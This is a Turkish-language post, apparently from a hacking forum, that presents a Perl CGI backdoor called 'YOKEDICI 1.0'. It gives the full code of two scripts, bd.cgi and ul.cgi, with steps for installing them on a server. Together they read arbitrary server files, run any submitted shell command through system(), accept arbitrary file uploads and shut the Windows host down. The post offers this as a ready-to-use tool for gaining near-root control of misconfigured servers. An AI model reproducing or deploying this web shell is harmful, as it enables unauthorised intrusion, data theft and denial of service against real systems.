Bu Birazdan Verecegim Kodlar Perl / CGI Scriptidir. Server Yanlis Kuruldugunda Bu Bug Meydana Cikar Ve Göreceksiniz Cok Tehlikeli Bir Bugdur.
Bug Sayesinde Servere ROOT Olarak Baglanabilir Ve Hemen Hemen Tüm ROOT Yetkilerine Sahip Olabilirsiniz. Servere Download Upload Yapabilir Hatta Isterseniz Serveri Tamamen Kapatabilirsiniz ))
Kodlar1:
#YOKEDICI 1.0 - CGI Backdoor
#Variablen (Bunu Degistirmeyin)
$name = "bd.cgi"; #Scriptin Ismi
$uploadname = "ul.cgi"; #Upload Scriptinin Ismi
$rootfolder = "../root/";
$pos = "c:\\httpd\\cgi-bin\\"; #Scriptlerin Pathi
#Code (Bunu Degistirmeyin)
&parse_form;
if ($in{art} eq "") {
print "Content-Type: text/html\n\n";
print "<html><head><title>Commands</title></head>";
print "<body><font size=\"2\" face=\"Verdana, Arial\">";
print "<form action=\"$name\" method=\"POST\">";
print "<INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"1\">1: Dosya Indir: Path: <input name=\"filepfad\" type=\"text\" value=\"c:\\WINNT\\\"> Dosya Ismi: <input name=\"filename\" type=\"text\" value=\"explorer.exe\">";
print "<br><INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"2\">2: Dosya Upload";
print "<br><INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"3\">3: DOS Komutlari: <input name=\"cmd\" type=\"text\" value=\"dir \\\">";
print "<br><INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"4\">4: Serveri Kapat";
print "<br><br><INPUT TYPE=\"SUBMIT\" VALUE=\"Yolla\">";
print "</form></font></body></html>";
}
elsif ($in{art} eq "1") {
$pfad = "$in{filepfad}$in{filename}";
open(DATEI, $pfad);
@inhalt=<DATEI>;
close(DATEI);
$pfad = "$rootfolder$in{filename}";
open(DATEI, ">$pfad");
foreach $zeile (@inhalt) {
print DATEI "$zeile\n";
}
print "Content-Type: text/html\n\n";
print "<html><head><title>Dosya Indir</title></head>";
print "<body><font size=\"2\" face=\"Verdana, Arial\">";
print "Bu $in{filename} Dosyayi <a href=\"../$in{filename}\">Burdan</a> Indirebilirsin.";
print "</font></form></body></html>";
}
elsif ($in{art} eq "2") {
print "Content-Type: text/html\n\n";
print "<html><head><title>Dosya Sec</title></head><body>Dosya Sec:<br>";
print "<form name=\"Upload\" action=\"$uploadname\" method=\"POST\" enctype=\"multipart/form-data\"> <input type=\"file\" name=\"Dosya\" size=\"30\"> <input type=\"submit\" value=\"Upload Et\"> </form>";
print "</body></html>";
}
elsif ($in{art} eq "3") {
print "Content-Type: text/html\n\n";
print "<html><head><title>DOS</title></head><body><pre>";
system ("$in{cmd}");
print "</pre></body></html>";
}
elsif ($in{art} eq "4") {
print "Content-Type: text/html\n\n";
system ("c:\\winnt\\system32\\rundll32.exe shell32,SHExitWindowsEx 2");
}
sub parse_form {
local ($buffer, @pairs, $pair, $name, $value);
# Read in text
$ENV{REQUEST_METHOD} =~ tr/a-z/A-Z/;
if ($ENV{REQUEST_METHOD} eq "POST")
{
read(STDIN, $buffer, $ENV{CONTENT_LENGTH});
}
else
{
$buffer = $ENV{QUERY_STRING};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$in{$name} = $value;
}
}
Evet Arkadaslar Bu Kodlari Text Editore Yaziyoruz Ve bd.cgi Olarak Kayit Ediyoruz. Yalniz Yukarida Belirtilen Pathleri Servere Göre Degistirmeniz Gerekecek.
Kodlar2:
#!/usr/bin/perl
binmode STDIN;
read STDIN, $Daten, $ENV{CONTENT_LENGTH};
@Teile = split /-----------------------------.{9}/, $Daten;
@Datei = split /\n/, $Teile[1], 5;
while ($Datei[1] =~ /\\/) { $Datei[1] =~ s/^.*\\//; }
$Datei[1] =~ s/"//;
chop $Datei[1];
chop $Datei[4]; chop $Datei[4];
open DATEI, ">$Datei[1]";
binmode DATEI;
print DATEI $Datei[4];
close DATEI;
print "Content-type: text/html\n\nUpload Basarili!";
Bu Kodda Hicbirsey Degistirmenize Gerek Yok. Bunuda Text Editore Yazip Ismini ul.cgi Olarak Kayit Ediyoruz. Evet Arkadaslar YOKEDICImiz Hazir )))
Simdi Bu Dosyalari Yüklüyoruz Ve Adres Barda bd.cgiyi Calistiriyoruz...
Selametle...